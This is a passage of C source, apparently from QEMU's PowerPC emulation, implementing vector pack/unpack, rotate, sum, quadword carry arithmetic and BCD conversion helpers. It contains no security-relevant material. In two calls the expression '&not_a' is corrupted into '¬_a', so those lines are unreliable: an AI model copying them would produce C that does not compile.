= prod[0].VsrD(1) ^ prod[1].VsrD(1); r->VsrD(0) = prod[0].VsrD(0) ^ prod[1].VsrD(0); #endif } #if defined(HOST_WORDS_BIGENDIAN) #define PKBIG 1 #else #define PKBIG 0 #endif void helper_vpkpx(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int i, j; ppc_avr_t result; #if defined(HOST_WORDS_BIGENDIAN) const ppc_avr_t *x[2] = { a, b }; #else const ppc_avr_t *x[2] = { b, a }; #endif VECTOR_FOR_INORDER_I(i, u64) { VECTOR_FOR_INORDER_I(j, u32) { uint32_t e = x[i]->u32[j]; result.u16[4 * i + j] = (((e >> 9) & 0xfc00) | ((e >> 6) & 0x3e0) | ((e >> 3) & 0x1f)); } } *r = result; } #define VPK(suffix, from, to, cvt, dosat) \ void helper_vpk##suffix(CPUPPCState *env, ppc_avr_t *r, \ ppc_avr_t *a, ppc_avr_t *b) \ { \ int i; \ int sat = 0; \ ppc_avr_t result; \ ppc_avr_t *a0 = PKBIG ? a : b; \ ppc_avr_t *a1 = PKBIG ? b : a; \ \ VECTOR_FOR_INORDER_I(i, from) { \ result.to[i] = cvt(a0->from[i], &sat); \ result.to[i + ARRAY_SIZE(r->from)] = cvt(a1->from[i], &sat);\ } \ *r = result; \ if (dosat && sat) { \ set_vscr_sat(env); \ } \ } #define I(x, y) (x) VPK(shss, s16, s8, cvtshsb, 1) VPK(shus, s16, u8, cvtshub, 1) VPK(swss, s32, s16, cvtswsh, 1) VPK(swus, s32, u16, cvtswuh, 1) VPK(sdss, s64, s32, cvtsdsw, 1) VPK(sdus, s64, u32, cvtsduw, 1) VPK(uhus, u16, u8, cvtuhub, 1) VPK(uwus, u32, u16, cvtuwuh, 1) VPK(udus, u64, u32, cvtuduw, 1) VPK(uhum, u16, u8, I, 0) VPK(uwum, u32, u16, I, 0) VPK(udum, u64, u32, I, 0) #undef I #undef VPK #undef PKBIG void helper_vrefp(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *b) { int i; for (i = 0; i < ARRAY_SIZE(r->f32); i++) { r->f32[i] = float32_div(float32_one, b->f32[i], &env->vec_status); } } #define VRFI(suffix, rounding) \ void helper_vrfi##suffix(CPUPPCState *env, ppc_avr_t *r, \ ppc_avr_t *b) \ { \ int i; \ float_status s = env->vec_status; \ \ set_float_rounding_mode(rounding, &s); \ for (i = 0; i < ARRAY_SIZE(r->f32); i++) { \ r->f32[i] = float32_round_to_int (b->f32[i], &s); \ } \ } VRFI(n, float_round_nearest_even) VRFI(m, float_round_down) VRFI(p, float_round_up) VRFI(z, float_round_to_zero) #undef VRFI #define VROTATE(suffix, element, mask) \ void helper_vrl##suffix(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) \ { \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->element); i++) { \ unsigned int shift = b->element[i] & mask; \ r->element[i] = (a->element[i] << shift) | \ (a->element[i] >> (sizeof(a->element[0]) * 8 - shift)); \ } \ } VROTATE(b, u8, 0x7) VROTATE(h, u16, 0xF) VROTATE(w, u32, 0x1F) VROTATE(d, u64, 0x3F) #undef VROTATE void helper_vrsqrtefp(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *b) { int i; for (i = 0; i < ARRAY_SIZE(r->f32); i++) { float32 t = float32_sqrt(b->f32[i], &env->vec_status); r->f32[i] = float32_div(float32_one, t, &env->vec_status); } } #define VRLMI(name, size, element, insert) \ void helper_##name(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) \ { \ int i; \ for (i = 0; i < ARRAY_SIZE(r->element); i++) { \ uint##size##_t src1 = a->element[i]; \ uint##size##_t src2 = b->element[i]; \ uint##size##_t src3 = r->element[i]; \ uint##size##_t begin, end, shift, mask, rot_val; \ \ shift = extract##size(src2, 0, 6); \ end = extract##size(src2, 8, 6); \ begin = extract##size(src2, 16, 6); \ rot_val = rol##size(src1, shift); \ mask = mask_u##size(begin, end); \ if (insert) { \ r->element[i] = (rot_val & mask) | (src3 & ~mask); \ } else { \ r->element[i] = (rot_val & mask); \ } \ } \ } VRLMI(vrldmi, 64, u64, 1); VRLMI(vrlwmi, 32, u32, 1); VRLMI(vrldnm, 64, u64, 0); VRLMI(vrlwnm, 32, u32, 0); void helper_vsel(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { r->u64[0] = (a->u64[0] & ~c->u64[0]) | (b->u64[0] & c->u64[0]); r->u64[1] = (a->u64[1] & ~c->u64[1]) | (b->u64[1] & c->u64[1]); } void helper_vexptefp(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *b) { int i; for (i = 0; i < ARRAY_SIZE(r->f32); i++) { r->f32[i] = float32_exp2(b->f32[i], &env->vec_status); } } void helper_vlogefp(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *b) { int i; for (i = 0; i < ARRAY_SIZE(r->f32); i++) { r->f32[i] = float32_log2(b->f32[i], &env->vec_status); } } #if defined(HOST_WORDS_BIGENDIAN) #define VEXTU_X_DO(name, size, left) \ target_ulong glue(helper_, name)(target_ulong a, ppc_avr_t *b) \ { \ int index; \ if (left) { \ index = (a & 0xf) * 8; \ } else { \ index = ((15 - (a & 0xf) + 1) * 8) - size; \ } \ return int128_getlo(int128_rshift(b->s128, index)) & \ MAKE_64BIT_MASK(0, size); \ } #else #define VEXTU_X_DO(name, size, left) \ target_ulong glue(helper_, name)(target_ulong a, ppc_avr_t *b) \ { \ int index; \ if (left) { \ index = ((15 - (a & 0xf) + 1) * 8) - size; \ } else { \ index = (a & 0xf) * 8; \ } \ return int128_getlo(int128_rshift(b->s128, index)) & \ MAKE_64BIT_MASK(0, size); \ } #endif VEXTU_X_DO(vextublx, 8, 1) VEXTU_X_DO(vextuhlx, 16, 1) VEXTU_X_DO(vextuwlx, 32, 1) VEXTU_X_DO(vextubrx, 8, 0) VEXTU_X_DO(vextuhrx, 16, 0) VEXTU_X_DO(vextuwrx, 32, 0) #undef VEXTU_X_DO void helper_vslv(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int i; unsigned int shift, bytes, size; size = ARRAY_SIZE(r->u8); for (i = 0; i < size; i++) { shift = b->VsrB(i) & 0x7; /* extract shift value */ bytes = (a->VsrB(i) << 8) + /* extract adjacent bytes */ (((i + 1) < size) ? a->VsrB(i + 1) : 0); r->VsrB(i) = (bytes << shift) >> 8; /* shift and store result */ } } void helper_vsrv(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int i; unsigned int shift, bytes; /* * Use reverse order, as destination and source register can be * same. Its being modified in place saving temporary, reverse * order will guarantee that computed result is not fed back. */ for (i = ARRAY_SIZE(r->u8) - 1; i >= 0; i--) { shift = b->VsrB(i) & 0x7; /* extract shift value */ bytes = ((i ? a->VsrB(i - 1) : 0) << 8) + a->VsrB(i); /* extract adjacent bytes */ r->VsrB(i) = (bytes >> shift) & 0xFF; /* shift and store result */ } } void helper_vsldoi(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, uint32_t shift) { int sh = shift & 0xf; int i; ppc_avr_t result; for (i = 0; i < ARRAY_SIZE(r->u8); i++) { int index = sh + i; if (index > 0xf) { result.VsrB(i) = b->VsrB(index - 0x10); } else { result.VsrB(i) = a->VsrB(index); } } *r = result; } void helper_vslo(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int sh = (b->VsrB(0xf) >> 3) & 0xf; #if defined(HOST_WORDS_BIGENDIAN) memmove(&r->u8[0], &a->u8[sh], 16 - sh); memset(&r->u8[16 - sh], 0, sh); #else memmove(&r->u8[sh], &a->u8[0], 16 - sh); memset(&r->u8[0], 0, sh); #endif } #if defined(HOST_WORDS_BIGENDIAN) #define VINSERT(suffix, element) \ void helper_vinsert##suffix(ppc_avr_t *r, ppc_avr_t *b, uint32_t index) \ { \ memmove(&r->u8[index], &b->u8[8 - sizeof(r->element[0])], \ sizeof(r->element[0])); \ } #else #define VINSERT(suffix, element) \ void helper_vinsert##suffix(ppc_avr_t *r, ppc_avr_t *b, uint32_t index) \ { \ uint32_t d = (16 - index) - sizeof(r->element[0]); \ memmove(&r->u8[d], &b->u8[8], sizeof(r->element[0])); \ } #endif VINSERT(b, u8) VINSERT(h, u16) VINSERT(w, u32) VINSERT(d, u64) #undef VINSERT #if defined(HOST_WORDS_BIGENDIAN) #define VEXTRACT(suffix, element) \ void helper_vextract##suffix(ppc_avr_t *r, ppc_avr_t *b, uint32_t index) \ { \ uint32_t es = sizeof(r->element[0]); \ memmove(&r->u8[8 - es], &b->u8[index], es); \ memset(&r->u8[8], 0, 8); \ memset(&r->u8[0], 0, 8 - es); \ } #else #define VEXTRACT(suffix, element) \ void helper_vextract##suffix(ppc_avr_t *r, ppc_avr_t *b, uint32_t index) \ { \ uint32_t es = sizeof(r->element[0]); \ uint32_t s = (16 - index) - es; \ memmove(&r->u8[8], &b->u8[s], es); \ memset(&r->u8[0], 0, 8); \ memset(&r->u8[8 + es], 0, 8 - es); \ } #endif VEXTRACT(ub, u8) VEXTRACT(uh, u16) VEXTRACT(uw, u32) VEXTRACT(d, u64) #undef VEXTRACT void helper_xxextractuw(CPUPPCState *env, ppc_vsr_t *xt, ppc_vsr_t *xb, uint32_t index) { ppc_vsr_t t = { 0 }; size_t es = sizeof(uint32_t); uint32_t ext_index; int i; ext_index = index; for (i = 0; i < es; i++, ext_index++) { t.VsrB(8 - es + i) = xb->VsrB(ext_index % 16); } *xt = t; } void helper_xxinsertw(CPUPPCState *env, ppc_vsr_t *xt, ppc_vsr_t *xb, uint32_t index) { ppc_vsr_t t = *xt; size_t es = sizeof(uint32_t); int ins_index, i = 0; ins_index = index; for (i = 0; i < es && ins_index < 16; i++, ins_index++) { t.VsrB(ins_index) = xb->VsrB(8 - es + i); } *xt = t; } #define VEXT_SIGNED(name, element, cast) \ void helper_##name(ppc_avr_t *r, ppc_avr_t *b) \ { \ int i; \ for (i = 0; i < ARRAY_SIZE(r->element); i++) { \ r->element[i] = (cast)b->element[i]; \ } \ } VEXT_SIGNED(vextsb2w, s32, int8_t) VEXT_SIGNED(vextsb2d, s64, int8_t) VEXT_SIGNED(vextsh2w, s32, int16_t) VEXT_SIGNED(vextsh2d, s64, int16_t) VEXT_SIGNED(vextsw2d, s64, int32_t) #undef VEXT_SIGNED #define VNEG(name, element) \ void helper_##name(ppc_avr_t *r, ppc_avr_t *b) \ { \ int i; \ for (i = 0; i < ARRAY_SIZE(r->element); i++) { \ r->element[i] = -b->element[i]; \ } \ } VNEG(vnegw, s32) VNEG(vnegd, s64) #undef VNEG void helper_vsro(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int sh = (b->VsrB(0xf) >> 3) & 0xf; #if defined(HOST_WORDS_BIGENDIAN) memmove(&r->u8[sh], &a->u8[0], 16 - sh); memset(&r->u8[0], 0, sh); #else memmove(&r->u8[0], &a->u8[sh], 16 - sh); memset(&r->u8[16 - sh], 0, sh); #endif } void helper_vsubcuw(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int i; for (i = 0; i < ARRAY_SIZE(r->u32); i++) { r->u32[i] = a->u32[i] >= b->u32[i]; } } void helper_vsumsws(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int64_t t; int i, upper; ppc_avr_t result; int sat = 0; upper = ARRAY_SIZE(r->s32) - 1; t = (int64_t)b->VsrSW(upper); for (i = 0; i < ARRAY_SIZE(r->s32); i++) { t += a->VsrSW(i); result.VsrSW(i) = 0; } result.VsrSW(upper) = cvtsdsw(t, &sat); *r = result; if (sat) { set_vscr_sat(env); } } void helper_vsum2sws(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int i, j, upper; ppc_avr_t result; int sat = 0; upper = 1; for (i = 0; i < ARRAY_SIZE(r->u64); i++) { int64_t t = (int64_t)b->VsrSW(upper + i * 2); result.VsrD(i) = 0; for (j = 0; j < ARRAY_SIZE(r->u64); j++) { t += a->VsrSW(2 * i + j); } result.VsrSW(upper + i * 2) = cvtsdsw(t, &sat); } *r = result; if (sat) { set_vscr_sat(env); } } void helper_vsum4sbs(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int i, j; int sat = 0; for (i = 0; i < ARRAY_SIZE(r->s32); i++) { int64_t t = (int64_t)b->s32[i]; for (j = 0; j < ARRAY_SIZE(r->s32); j++) { t += a->s8[4 * i + j]; } r->s32[i] = cvtsdsw(t, &sat); } if (sat) { set_vscr_sat(env); } } void helper_vsum4shs(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int sat = 0; int i; for (i = 0; i < ARRAY_SIZE(r->s32); i++) { int64_t t = (int64_t)b->s32[i]; t += a->s16[2 * i] + a->s16[2 * i + 1]; r->s32[i] = cvtsdsw(t, &sat); } if (sat) { set_vscr_sat(env); } } void helper_vsum4ubs(CPUPPCState *env, ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { int i, j; int sat = 0; for (i = 0; i < ARRAY_SIZE(r->u32); i++) { uint64_t t = (uint64_t)b->u32[i]; for (j = 0; j < ARRAY_SIZE(r->u32); j++) { t += a->u8[4 * i + j]; } r->u32[i] = cvtuduw(t, &sat); } if (sat) { set_vscr_sat(env); } } #if defined(HOST_WORDS_BIGENDIAN) #define UPKHI 1 #define UPKLO 0 #else #define UPKHI 0 #define UPKLO 1 #endif #define VUPKPX(suffix, hi) \ void helper_vupk##suffix(ppc_avr_t *r, ppc_avr_t *b) \ { \ int i; \ ppc_avr_t result; \ \ for (i = 0; i < ARRAY_SIZE(r->u32); i++) { \ uint16_t e = b->u16[hi ? i : i + 4]; \ uint8_t a = (e >> 15) ? 0xff : 0; \ uint8_t r = (e >> 10) & 0x1f; \ uint8_t g = (e >> 5) & 0x1f; \ uint8_t b = e & 0x1f; \ \ result.u32[i] = (a << 24) | (r << 16) | (g << 8) | b; \ } \ *r = result; \ } VUPKPX(lpx, UPKLO) VUPKPX(hpx, UPKHI) #undef VUPKPX #define VUPK(suffix, unpacked, packee, hi) \ void helper_vupk##suffix(ppc_avr_t *r, ppc_avr_t *b) \ { \ int i; \ ppc_avr_t result; \ \ if (hi) { \ for (i = 0; i < ARRAY_SIZE(r->unpacked); i++) { \ result.unpacked[i] = b->packee[i]; \ } \ } else { \ for (i = ARRAY_SIZE(r->unpacked); i < ARRAY_SIZE(r->packee); \ i++) { \ result.unpacked[i - ARRAY_SIZE(r->unpacked)] = b->packee[i]; \ } \ } \ *r = result; \ } VUPK(hsb, s16, s8, UPKHI) VUPK(hsh, s32, s16, UPKHI) VUPK(hsw, s64, s32, UPKHI) VUPK(lsb, s16, s8, UPKLO) VUPK(lsh, s32, s16, UPKLO) VUPK(lsw, s64, s32, UPKLO) #undef VUPK #undef UPKHI #undef UPKLO #define VGENERIC_DO(name, element) \ void helper_v##name(ppc_avr_t *r, ppc_avr_t *b) \ { \ int i; \ \ for (i = 0; i < ARRAY_SIZE(r->element); i++) { \ r->element[i] = name(b->element[i]); \ } \ } #define clzb(v) ((v) ? clz32((uint32_t)(v) << 24) : 8) #define clzh(v) ((v) ? clz32((uint32_t)(v) << 16) : 16) VGENERIC_DO(clzb, u8) VGENERIC_DO(clzh, u16) #undef clzb #undef clzh #define ctzb(v) ((v) ? ctz32(v) : 8) #define ctzh(v) ((v) ? ctz32(v) : 16) #define ctzw(v) ctz32((v)) #define ctzd(v) ctz64((v)) VGENERIC_DO(ctzb, u8) VGENERIC_DO(ctzh, u16) VGENERIC_DO(ctzw, u32) VGENERIC_DO(ctzd, u64) #undef ctzb #undef ctzh #undef ctzw #undef ctzd #define popcntb(v) ctpop8(v) #define popcnth(v) ctpop16(v) #define popcntw(v) ctpop32(v) #define popcntd(v) ctpop64(v) VGENERIC_DO(popcntb, u8) VGENERIC_DO(popcnth, u16) VGENERIC_DO(popcntw, u32) VGENERIC_DO(popcntd, u64) #undef popcntb #undef popcnth #undef popcntw #undef popcntd #undef VGENERIC_DO #if defined(HOST_WORDS_BIGENDIAN) #define QW_ONE { .u64 = { 0, 1 } } #else #define QW_ONE { .u64 = { 1, 0 } } #endif #ifndef CONFIG_INT128 static inline void avr_qw_not(ppc_avr_t *t, ppc_avr_t a) { t->u64[0] = ~a.u64[0]; t->u64[1] = ~a.u64[1]; } static int avr_qw_cmpu(ppc_avr_t a, ppc_avr_t b) { if (a.VsrD(0) < b.VsrD(0)) { return -1; } else if (a.VsrD(0) > b.VsrD(0)) { return 1; } else if (a.VsrD(1) < b.VsrD(1)) { return -1; } else if (a.VsrD(1) > b.VsrD(1)) { return 1; } else { return 0; } } static void avr_qw_add(ppc_avr_t *t, ppc_avr_t a, ppc_avr_t b) { t->VsrD(1) = a.VsrD(1) + b.VsrD(1); t->VsrD(0) = a.VsrD(0) + b.VsrD(0) + (~a.VsrD(1) < b.VsrD(1)); } static int avr_qw_addc(ppc_avr_t *t, ppc_avr_t a, ppc_avr_t b) { ppc_avr_t not_a; t->VsrD(1) = a.VsrD(1) + b.VsrD(1); t->VsrD(0) = a.VsrD(0) + b.VsrD(0) + (~a.VsrD(1) < b.VsrD(1)); avr_qw_not(¬_a, a); return avr_qw_cmpu(not_a, b) < 0; } #endif void helper_vadduqm(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { #ifdef CONFIG_INT128 r->u128 = a->u128 + b->u128; #else avr_qw_add(r, *a, *b); #endif } void helper_vaddeuqm(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { #ifdef CONFIG_INT128 r->u128 = a->u128 + b->u128 + (c->u128 & 1); #else if (c->VsrD(1) & 1) { ppc_avr_t tmp; tmp.VsrD(0) = 0; tmp.VsrD(1) = c->VsrD(1) & 1; avr_qw_add(&tmp, *a, tmp); avr_qw_add(r, tmp, *b); } else { avr_qw_add(r, *a, *b); } #endif } void helper_vaddcuq(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { #ifdef CONFIG_INT128 r->u128 = (~a->u128 < b->u128); #else ppc_avr_t not_a; avr_qw_not(¬_a, *a); r->VsrD(0) = 0; r->VsrD(1) = (avr_qw_cmpu(not_a, *b) < 0); #endif } void helper_vaddecuq(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { #ifdef CONFIG_INT128 int carry_out = (~a->u128 < b->u128); if (!carry_out && (c->u128 & 1)) { carry_out = ((a->u128 + b->u128 + 1) == 0) && ((a->u128 != 0) || (b->u128 != 0)); } r->u128 = carry_out; #else int carry_in = c->VsrD(1) & 1; int carry_out = 0; ppc_avr_t tmp; carry_out = avr_qw_addc(&tmp, *a, *b); if (!carry_out && carry_in) { ppc_avr_t one = QW_ONE; carry_out = avr_qw_addc(&tmp, tmp, one); } r->VsrD(0) = 0; r->VsrD(1) = carry_out; #endif } void helper_vsubuqm(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { #ifdef CONFIG_INT128 r->u128 = a->u128 - b->u128; #else ppc_avr_t tmp; ppc_avr_t one = QW_ONE; avr_qw_not(&tmp, *b); avr_qw_add(&tmp, *a, tmp); avr_qw_add(r, tmp, one); #endif } void helper_vsubeuqm(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { #ifdef CONFIG_INT128 r->u128 = a->u128 + ~b->u128 + (c->u128 & 1); #else ppc_avr_t tmp, sum; avr_qw_not(&tmp, *b); avr_qw_add(&sum, *a, tmp); tmp.VsrD(0) = 0; tmp.VsrD(1) = c->VsrD(1) & 1; avr_qw_add(r, sum, tmp); #endif } void helper_vsubcuq(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { #ifdef CONFIG_INT128 r->u128 = (~a->u128 < ~b->u128) || (a->u128 + ~b->u128 == (__uint128_t)-1); #else int carry = (avr_qw_cmpu(*a, *b) > 0); if (!carry) { ppc_avr_t tmp; avr_qw_not(&tmp, *b); avr_qw_add(&tmp, *a, tmp); #ifdef _MSC_VER carry = ((tmp.VsrSD(0) == (0ULL - 1ULL)) && (tmp.VsrSD(1) == (0ULL - 1ULL))); #else carry = ((tmp.VsrSD(0) == -1ull) && (tmp.VsrSD(1) == -1ull)); #endif } r->VsrD(0) = 0; r->VsrD(1) = carry; #endif } void helper_vsubecuq(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { #ifdef CONFIG_INT128 r->u128 = (~a->u128 < ~b->u128) || ((c->u128 & 1) && (a->u128 + ~b->u128 == (__uint128_t)-1)); #else int carry_in = c->VsrD(1) & 1; int carry_out = (avr_qw_cmpu(*a, *b) > 0); if (!carry_out && carry_in) { ppc_avr_t tmp; avr_qw_not(&tmp, *b); avr_qw_add(&tmp, *a, tmp); #ifdef _MSC_VER carry_out = ((tmp.VsrD(0) == (0ULL - 1ULL)) && (tmp.VsrD(1) == (0ULL - 1ULL))); #else carry_out = ((tmp.VsrD(0) == -1ull) && (tmp.VsrD(1) == -1ull)); #endif } r->VsrD(0) = 0; r->VsrD(1) = carry_out; #endif } #define BCD_PLUS_PREF_1 0xC #define BCD_PLUS_PREF_2 0xF #define BCD_PLUS_ALT_1 0xA #define BCD_NEG_PREF 0xD #define BCD_NEG_ALT 0xB #define BCD_PLUS_ALT_2 0xE #define NATIONAL_PLUS 0x2B #define NATIONAL_NEG 0x2D #define BCD_DIG_BYTE(n) (15 - ((n) / 2)) static int bcd_get_sgn(ppc_avr_t *bcd) { switch (bcd->VsrB(BCD_DIG_BYTE(0)) & 0xF) { case BCD_PLUS_PREF_1: case BCD_PLUS_PREF_2: case BCD_PLUS_ALT_1: case BCD_PLUS_ALT_2: { return 1; } case BCD_NEG_PREF: case BCD_NEG_ALT: { return -1; } default: { return 0; } } } static int bcd_preferred_sgn(int sgn, int ps) { if (sgn >= 0) { return (ps == 0) ? BCD_PLUS_PREF_1 : BCD_PLUS_PREF_2; } else { return BCD_NEG_PREF; } } static uint8_t bcd_get_digit(ppc_avr_t *bcd, int n, int *invalid) { uint8_t result; if (n & 1) { result = bcd->VsrB(BCD_DIG_BYTE(n)) >> 4; } else { result = bcd->VsrB(BCD_DIG_BYTE(n)) & 0xF; } if (unlikely(result > 9)) { *invalid = true; } return result; } static void bcd_put_digit(ppc_avr_t *bcd, uint8_t digit, int n) { if (n & 1) { bcd->VsrB(BCD_DIG_BYTE(n)) &= 0x0F; bcd->VsrB(BCD_DIG_BYTE(n)) |= (digit << 4); } else { bcd->VsrB(BCD_DIG_BYTE(n)) &= 0xF0; bcd->VsrB(BCD_DIG_BYTE(n)) |= digit; } } static bool bcd_is_valid(ppc_avr_t *bcd) { int i; int invalid = 0; if (bcd_get_sgn(bcd) == 0) { return false; } for (i = 1; i < 32; i++) { bcd_get_digit(bcd, i, &invalid); if (unlikely(invalid)) { return false; } } return true; } static int bcd_cmp_zero(ppc_avr_t *bcd) { if (bcd->VsrD(0) == 0 && (bcd->VsrD(1) >> 4) == 0) { return CRF_EQ; } else { return (bcd_get_sgn(bcd) == 1) ? CRF_GT : CRF_LT; } } static uint16_t get_national_digit(ppc_avr_t *reg, int n) { return reg->VsrH(7 - n); } static void set_national_digit(ppc_avr_t *reg, uint8_t val, int n) { reg->VsrH(7 - n) = val; } static int bcd_cmp_mag(ppc_avr_t *a, ppc_avr_t *b) { int i; int invalid = 0; for (i = 31; i > 0; i--) { uint8_t dig_a = bcd_get_digit(a, i, &invalid); uint8_t dig_b = bcd_get_digit(b, i, &invalid); if (unlikely(invalid)) { return 0; /* doesn't matter */ } else if (dig_a > dig_b) { return 1; } else if (dig_a < dig_b) { return -1; } } return 0; } static void bcd_add_mag(ppc_avr_t *t, ppc_avr_t *a, ppc_avr_t *b, int *invalid, int *overflow) { int carry = 0; int i; for (i = 1; i <= 31; i++) { uint8_t digit = bcd_get_digit(a, i, invalid) + bcd_get_digit(b, i, invalid) + carry; if (digit > 9) { carry = 1; digit -= 10; } else { carry = 0; } bcd_put_digit(t, digit, i); } *overflow = carry; } static void bcd_sub_mag(ppc_avr_t *t, ppc_avr_t *a, ppc_avr_t *b, int *invalid, int *overflow) { int carry = 0; int i; for (i = 1; i <= 31; i++) { uint8_t digit = bcd_get_digit(a, i, invalid) - bcd_get_digit(b, i, invalid) + carry; if (digit & 0x80) { carry = -1; digit += 10; } else { carry = 0; } bcd_put_digit(t, digit, i); } *overflow = carry; } uint32_t helper_bcdadd(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, uint32_t ps) { int sgna = bcd_get_sgn(a); int sgnb = bcd_get_sgn(b); int invalid = (sgna == 0) || (sgnb == 0); int overflow = 0; uint32_t cr = 0; ppc_avr_t result = { .u64 = { 0, 0 } }; if (!invalid) { if (sgna == sgnb) { result.VsrB(BCD_DIG_BYTE(0)) = bcd_preferred_sgn(sgna, ps); bcd_add_mag(&result, a, b, &invalid, &overflow); cr = bcd_cmp_zero(&result); } else { int magnitude = bcd_cmp_mag(a, b); if (magnitude > 0) { result.VsrB(BCD_DIG_BYTE(0)) = bcd_preferred_sgn(sgna, ps); bcd_sub_mag(&result, a, b, &invalid, &overflow); cr = (sgna > 0) ? CRF_GT : CRF_LT; } else if (magnitude < 0) { result.VsrB(BCD_DIG_BYTE(0)) = bcd_preferred_sgn(sgnb, ps); bcd_sub_mag(&result, b, a, &invalid, &overflow); cr = (sgnb > 0) ? CRF_GT : CRF_LT; } else { result.VsrB(BCD_DIG_BYTE(0)) = bcd_preferred_sgn(0, ps); cr = CRF_EQ; } } } if (unlikely(invalid)) { result.VsrD(0) = result.VsrD(1) = -1; cr = CRF_SO; } else if (overflow) { cr |= CRF_SO; } *r = result; return cr; } uint32_t helper_bcdsub(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, uint32_t ps) { ppc_avr_t bcopy = *b; int sgnb = bcd_get_sgn(b); if (sgnb < 0) { bcd_put_digit(&bcopy, BCD_PLUS_PREF_1, 0); } else if (sgnb > 0) { bcd_put_digit(&bcopy, BCD_NEG_PREF, 0); } /* else invalid ... defer to bcdadd code for proper handling */ return helper_bcdadd(r, a, &bcopy, ps); } uint32_t helper_bcdcfn(ppc_avr_t *r, ppc_avr_t *b, uint32_t ps) { int i; int cr = 0; uint16_t national = 0; uint16_t sgnb = get_national_digit(b, 0); ppc_avr_t ret = { .u64 = { 0, 0 } }; int invalid = (sgnb != NATIONAL_PLUS && sgnb != NATIONAL_NEG); for (i = 1; i < 8; i++) { national = get_national_digit(b, i); if (unlikely(national < 0x30 || national > 0x39)) { invalid = 1; break; } bcd_put_digit(&ret, national & 0xf, i); } if (sgnb == NATIONAL_PLUS) { bcd_put_digit(&ret, (ps == 0) ? BCD_PLUS_PREF_1 : BCD_PLUS_PREF_2, 0); } else { bcd_put_digit(&ret, BCD_NEG_PREF, 0); } cr = bcd_cmp_zero(&ret); if (unlikely(invalid)) { cr = CRF_SO; } *r = ret; return cr; } uint32_t helper_bcdctn(ppc_avr_t *r, ppc_avr_t *b, uint32_t ps) { int i; int cr = 0; int sgnb = bcd_get_sgn(b); int invalid = (sgnb == 0); ppc_avr_t ret = { .u64 = { 0, 0 } }; int ox_flag = (b->VsrD(0) != 0) || ((b->VsrD(1) >> 32) != 0); for (i = 1; i < 8; i++) { set_national_digit(&ret, 0x30 + bcd_get_digit(b, i, &invalid), i); if (unlikely(invalid)) { break; } } set_national_digit(&ret, (sgnb == -1) ? NATIONAL_NEG : NATIONAL_PLUS, 0); cr = bcd_cmp_zero(b); if (ox_flag) { cr |= CRF_SO; } if (unlikely(invalid)) { cr = CRF_SO; } *r = ret; return cr; } uint32_t helper_bcdcfz(ppc_avr_t *r, ppc_avr_t *b, uint32_t ps) { int i; int cr = 0; int invalid = 0; int zone_digit = 0; int zone_lead = ps ? 0xF : 0x3; int digit = 0; ppc_avr_t ret = { .u64 = { 0, 0 } }; int sgnb = b->VsrB(BCD_DIG_BYTE(0)) >> 4; if (unlikely((sgnb < 0xA) && ps)) { invalid = 1; } for (i = 0; i < 16; i++) { zone_digit = i ? b->VsrB(BCD_DIG_BYTE(i * 2)) >> 4 : zone_lead; digit = b->VsrB(BCD_DIG_BYTE(i * 2)) & 0xF; if (unlikely(zone_digit != zone_lead || digit > 0x9)) { invalid = 1; break; } bcd_put_digit(&ret, digit, i + 1); } if ((ps && (sgnb == 0xB || sgnb == 0xD)) || (!ps && (sgnb & 0x4))) { bcd_put_digit(&ret, BCD_NEG_PREF, 0); } else { bcd_put_digit(&ret, BCD_PLUS_PREF_1, 0); } cr = bcd_cmp_zero(&ret); if (unlikely(invalid)) { cr = CRF_SO; } *r = ret; return cr; } uint32_t helper_bcdctz(ppc_avr_t *r, ppc_avr_t *b, uint32_t ps) { int i; int cr = 0; uint8_t digit = 0; int sgnb = bcd_get_sgn(b); int zone_lead = (ps) ? 0xF0 : 0x30; int invalid = (sgnb == 0); ppc_avr_t ret = { .u64 = { 0, 0 } }; int ox_flag = ((b->VsrD(0) >> 4) != 0); for (i = 0; i < 16; i++) { digit = bcd_get_digit(b, i + 1, &invalid); if (unlikely(invalid)) { break; } ret.VsrB(BCD_DIG_BYTE(i * 2)) = zone_lead + digit; } if (ps) { bcd_put_digit(&ret, (sgnb == 1) ? 0xC : 0xD, 1); } else { bcd_put_digit(&ret, (sgnb == 1) ? 0x3 : 0x7, 1); } cr = bcd_cmp_zero(b); if (ox_flag) { cr |= CRF_SO; } if (unlikely(invalid)) { cr = CRF_SO; } *r = ret; return cr; } uint32_t helper_bcdcfsq(ppc_avr_t *r, ppc_avr_t *b, uint32_t ps) { int i; int cr = 0; uint64_t lo_value; uint64_t hi_value; ppc_avr_t ret = { .u64 = { 0, 0 } }; if 